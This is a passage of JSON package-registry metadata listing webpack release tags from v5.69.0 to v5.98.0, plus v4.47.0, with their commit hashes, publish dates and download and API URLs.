":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5